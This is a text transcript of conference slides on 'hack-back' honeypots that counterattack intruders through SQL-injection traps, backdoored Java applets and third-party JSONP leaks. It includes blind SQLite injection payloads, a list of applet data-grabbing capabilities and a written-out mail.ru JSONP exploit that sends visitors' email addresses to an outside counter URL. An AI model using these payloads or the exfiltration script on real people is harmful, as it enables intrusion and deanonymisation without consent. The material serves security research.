Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER...
Transcript of Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER...
![Page 1: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/1.jpg)
Honeypot that can bite: reverse penetra2on
Alexey Sintsov @asintsov
![Page 2: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/2.jpg)
#WHOAMI
• Senior Security Engineer at
• Writer at
• Ideology and co-‐organizer of
• Co-‐Founder of
ZeroNights
![Page 3: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/3.jpg)
#DISCLAIMER • This story is not connected to my EMPLOYER
• All LIVE data was got from Q2 2011 – Q3 2012
• It was done only for research purposes.
• All data was shared with NOBODY.
• Thx to Alexey Tyurin (@antyurin)
![Page 4: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/4.jpg)
#WHAT IS IT ABOUT honeypot
• AJract aJacker’s aJenMon (to HoneyPot) • Get paJerns and acMons from an aJacker behavior
Then Operator can understand what kind of aJacker we have, what he can do in the future and etc. ASer that we can Take some ‘preventaMve’ acMons. Example 1. Bot search for PHP LFI bug in PMA Def. acMons:
1) Do we have PMA? 2) Are our PMA installaMon accessible from
the Internet? 3) Bug fixed?
// but the same we can get from IDS…
Example 2. SQLi aJempt. Dumping hashes. Def. acMons:
1) What kind of SQLi he tried to exploit – let’s check our web-‐apps for same SQLi paJerns
2) Check hashes in our databases – is it salted? Do we have hashes at all? (or plain text?) 3) Check access to tables , is it possible to
get access by using ‘web’ account?
![Page 5: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/5.jpg)
#WHAT IS IT ABOUT aNackers
• Automated aNackers like BOTs AJack vectors: known paJerns Impact: InfecMng host
• Scr3pt k1dd13s AJack vectors: few paJerns Impact: deface/dump data/??
• Mo2vated aNackers AJack vectors: many paJerns Impact: ??
// It is not that easy in real world… // It is not about skills
![Page 6: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/6.jpg)
#WHOIS THE ATTACKER WhiteHats?
![Page 7: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/7.jpg)
#WHAT IS IT ABOUT classic…
IDS Alert
SQLi aJempt in some .php
Is it vulnerable?
What aJacker did?
Log/traffic analysis
Src analysis/ manual validaMon
Who is the aJacker?
-‐ Was he looking for something special? -‐ Is he going to comeback? -‐ How we should be prepared?
Deploy the Incident Response Team
© InfoSecReac2ons By @windsheep_
![Page 8: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/8.jpg)
#WHOIS THE ATTACKER Why?
I do not care, main task – fix the bug!
vs. It’s interesMng, I want to track him!
![Page 9: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/9.jpg)
#WHOIS THE ATTACKER Who wants to know…
• Enterprise -‐ Who is hunMng us like that?
(oil’s sector/big R&D) It is always good to know who has started this acMvity…. Because if it is just kids, it is one thing, if government or compeMtors – another thing.
• Government
-‐ Track cybercrimes -‐ Track another government… cyber war, blah-‐blah-‐blah… -‐ etc …
![Page 10: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/10.jpg)
#WHOIS THE ATTACKER IDS/Logs
• IP address -‐ TOR/(chain of)Proxy/BOTnet
• User-‐Agent -‐ lol We have sniffed got nothing…..
![Page 11: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/11.jpg)
#HONEYPOT What I want?
• Fast result: aJack or false posiMve?
• Is it a targeted aJack? Or just a scan from botnet?
• Is it a professional or kiddie
• Decloaking the aJacker
• Track the aJacker
![Page 12: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/12.jpg)
#Offensive
“The only real defense is acMve defense“ © Mao Zedong
• Hack your enemy first (aggressive)
• Hack your enemy back (defensive)
![Page 13: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/13.jpg)
#Offensive Not new…
AV/Security companies -‐ to take down botnet: • Hacking C&C • Hacking chain of BOTs • Hacking Admin’s workstaMon
© Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
![Page 14: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/14.jpg)
#Offensive We can do more… “Replay back” – answer with the same exploit back to the source:
• SSH Brute force aJack -‐ if the source has SSH service
-‐ replay with the same login/pass -‐-‐ aJacker has already changed password on pwned box
• PHP/Perl/Ruby web aJacks -‐ if the source has HTTP service -‐ replay back with same URI/payload
It is against BOTs, and will not work against real aJacker.
![Page 15: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/15.jpg)
#Offensive WWW
• Is it (the aJacker) HUMAN? • Is he using well-‐know applicaMon (browser/plugins)? • Can we EXPLOIT it?
Classical ExploitPACK?
![Page 16: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/16.jpg)
#Honeypot Skills? Bug Vulnerability Exploit ANack
Can be found automaMcally
SHOULD be found during manual tests
SHOULD be executed by the aJacker with browser!
ANacker’s level of skills • Low • Medium • High! • Dangerous, we are doomed!!!11
![Page 17: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/17.jpg)
#Honeypot Trap
• DIRBuster aJack, give them /admin/admin.php But what is the password?
// We can detect bruteforce aJacks…
• /admin/help.php?id=1 <-‐-‐SQL InjecMon Get password for admin.php • Login with stolen password to /admin/admin.php
• ANack complete!
![Page 18: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/18.jpg)
#Honeypot Blind SQL Injec2on (SQLite) ‘
-‐ 500 Error. This is a bug
‘/**/AND/**/ ‘1’ /**/like‘1’-‐-‐
-‐ 200. This is a vulnerability
‘union/**/select(CASE/**/WHEN/**/ sqlite_version()like'3.%'THEN/**/ select(1)from(lololo)ELSE’BHEU13’ END)
-‐ 200/500. This is an exploit
Skill-‐O-‐M
eter
Addi2onal to Skill-‐O-‐Metr
• Filtered Symbols, like ‘space’ • WAF with small ‘holes’ • etc, like CTF tasks or hackquest…
![Page 19: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/19.jpg)
#Honeypot ANack
‘union/**/select(CASE/**/WHEN(select/**/password/**/from/**/ users/**/where/**/user=‘admin’and/**/password/**/like/’a%’)THEN/**/ select(1)from(lololo)ELSE’BHEU13’END)
SQLite supports triggers…
![Page 20: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/20.jpg)
#Honeypot …can bite! • For each step we can get:
o Human/automated aJack (Skill-‐O-‐Meter) o The malicious intenMon of an aJacker
§ WhiteHat will finish aSer finding a SQLi vulnerability. He will not aJempt to get access to forbidden part (admin.php)!
• On each step we can bite… o On ‘aJack step’ we can counteraJack…
![Page 21: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/21.jpg)
#CounteraNack What we can? • AJack his browser/plugins
• 1day/0day exploits
• Social engineering • Evil Java applet/AcMveX (GUI for administraMon…) • Honeytokens
• AJack his env. using a browser. • Third party services (web-‐mail/social networks/etc) • Local env. (localhost/dsl-‐router)
![Page 22: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/22.jpg)
#Social Engineering Honeytokens
• PDF file with secret informaMon (and with exploit…)
• EXE file with secret applicaMon (fat client for SCADA…)
• etc….
![Page 23: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/23.jpg)
#Social Engineering Java/Ac2veX • Backdoor
• Backdoor
• Backdoor
• With some GUI…. 8))
![Page 24: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/24.jpg)
#Backdoor… ? No – “detec2ve”
• Get jpg/txt/doc files from FS
• Get config files (VPN)
• Get BSSIDs
• Get network/domain configuraMon
• Get traceroute to us
• Get DNS to us
• Get camera-‐shot, mic recording
• etc…
![Page 25: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/25.jpg)
#Let’s try an idea
![Page 26: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/26.jpg)
#Target
• Reverse DNS channel • ipconfig • tracert • Domain name • Login name • …
• DO NOT COLLECT PERSONAL INFO • DO NOT GET ANY DATA FROM HDD • REMOTE CONTROL DISABLED
![Page 27: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/27.jpg)
#Results
GET requests log
It can be WEB proxy or TOR exit point…
Data from aJacker’s PC
![Page 28: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/28.jpg)
#Results
Real logins – second names
Real host-‐names and domains
Real ISP, IP addresses
![Page 29: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/29.jpg)
#Results
Write-‐up about First DCG meeMng in Russia…
habrahabr.ru ß Most technical Russian IT community…
Comments… “ If someone wants invite: ‘ or 1=1– “
![Page 30: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/30.jpg)
#Hello “Red May” 2011
GET requests log
![Page 31: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/31.jpg)
#Unexpected
GET requests log
One beauMful Ex-‐USSR republic… Nothing special…
Damn! Special-‐Super-‐Secret-‐Service of beau2ful ex-‐USSR republic…
Looks like ‘service’ username, not personal… may be it was compromised?
![Page 32: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/32.jpg)
#More drama
… few hours laJer, another intrusion to DCG web-‐site … from same ex-‐USSR republic, same city…. … but another subnet … and again – “reverse penetraMon”
Known nickname, you can Google him as know hacker form this ex-‐USSR republic.. may be he is working for this Secret Service … or compromise this host and use as intermidiate…
![Page 33: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/33.jpg)
#Results
• WhiteHat companies – have tested our Applet!
• Independent WhiteHat researchers…
• Backdoored government WS….
• Script kiddies…
![Page 34: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/34.jpg)
#Conclusion It works! • We got real usernames of those who did not use VMware/and middle hosts
• We got real source for those who use VMware/TOR/Proxy and did not use middle hosts
• We got intermediate hosts, but we can detect it, end got
• We got configured DNS server address
• And we got it automaMcally…
The same results possible for honey token/exploit-‐back techniques…
SE: ANacker is not expec2ng back-‐aNack!
![Page 35: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/35.jpg)
#But Not all aNackers are not carefull
//@ahack_ru had known about Honeypot and Java applet and did not run it… but he was busted anyway!
![Page 36: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/36.jpg)
#Can we aNack 3rd party services? If user is authen2cated on others services
HoneyPot
AJacker
SocialNetwork
• AJack begins
• CSRF/XSS aJack…
• Callback with ID….
• Proxy/TOR/VPN – it is not about network! • Works only vs. script-‐kiddies and WhiteHats
![Page 37: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/37.jpg)
![Page 38: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/38.jpg)
#Yandex JSONP
![Page 39: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/39.jpg)
#mail.ru JSONP
Hack 1: SSL
Hack 2: <iframe src=“data:…
By Egor Homakov
![Page 40: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/40.jpg)
document.write("<iframe src='data:text/html,<html><body> <script>var sss = document.createElement(\"script\"); sss.src=\“ hJp://swa.mail.ru/cgi-‐bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612 \"; funcMon PortalHeadlineJSONPCallback(objFromMail){ var arr1=objFromMail[\"data\"]; var i = new Image(); i.src = \"hJp://defcon-‐russia.ru/counter.php?\"+arr1[\"email\"]; document.body.appendChild(i); }; document.body.appendChild(sss); </script> </body></html>'>");
#mail.ru exploit
![Page 41: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/41.jpg)
#Let’s try an idea
![Page 42: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/42.jpg)
#Results
![Page 43: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/43.jpg)
#Conclusion It works!
• We got real emails
• We got real names
• We can do correlaMon between two e-‐mail addresses and Java Applet response
• And we got it automaMcally…
![Page 44: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/44.jpg)
#Conclusion Stats!
• SQLi aJacks -‐ 484 (~1.2 years)
• Applet strikes -‐ 52 (~1.2 years)
• Mail grabs -‐ 16 (6 month)
![Page 45: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/45.jpg)
#Conclusion
Public announcements of DC Rus
First meeMng
Second meeMng
Sixth meeMng announcement, pre-‐Zeronights era
![Page 46: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/46.jpg)
#Conclusion Everybody likes graphics =)
![Page 47: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/47.jpg)
#Moarrrrrrrrr Local env. can be aNacked!
• AnM DNS pinning / DNS rebinding
• XXXSS by Samy Kamkar (Ge�ng BSSIDs…)
• CSRF/XSS on any local resources….
• There can be million techniques and tricks for that…
![Page 48: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/48.jpg)
#Moarrrrrrrrr More techniques and tricks…
OFFENSIVE COUNTERMEASURES:DEFENSIVE TACTICS THAT ACTUALLY WORK PAULDOTCOM
![Page 49: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/49.jpg)
#SE – Custom sopware An2-‐CyberCrime
![Page 50: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/50.jpg)
#SE – Custom sopware An2-‐Cybercrime
Login
Detect fraud/hack aNempt
Classic Ac2veX/Java
Backdoored Ac2veX/Java
Work… Error/
Meintance
![Page 51: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/51.jpg)
#SE – Custom sopware Government level
• SCADA
• Army systems • FSB/KGB/CIA/MI6/…
• etc..
![Page 52: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/52.jpg)
#SE – Custom sopware Soviet sopware?
![Page 53: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/53.jpg)
#SE – Custom sopware Soviet sopware?
• Yes, the same OS, hardware…
• But different client-‐server soSware…
![Page 54: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/54.jpg)
#SE – Custom sopware How it can be done?
• Fake vendor WWW/SoSware (SMART GRID)
• InteresMng (for an aJacker) honeypot host that has service for this SoSware
• + Java/AcMveX tricks…
![Page 55: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/55.jpg)
#SE – Custom sopware An2RE
• Hide code with intelligence purposes
• Make your code non-‐suspicious
• Add real funcMonality….
![Page 56: Honeypotthatcanbite:reverse( penetraon · #DISCLAIMER • This&story&is¬connected&to&my&EMPLOYER • All&LIVE&datawas&gotfrom& Q2(2011(–Q3(2012( • Itwas&done&only&for& researchpurposes.](https://reader036.fdocuments.in/reader036/viewer/2022071019/5fd2ff26834f64074e63ff9a/html5/thumbnails/56.jpg)
#Conclusion
• CounteraJack can work…
• WhiteHats are LESS carfull when tesMng something…
• ????
• Moral/Legal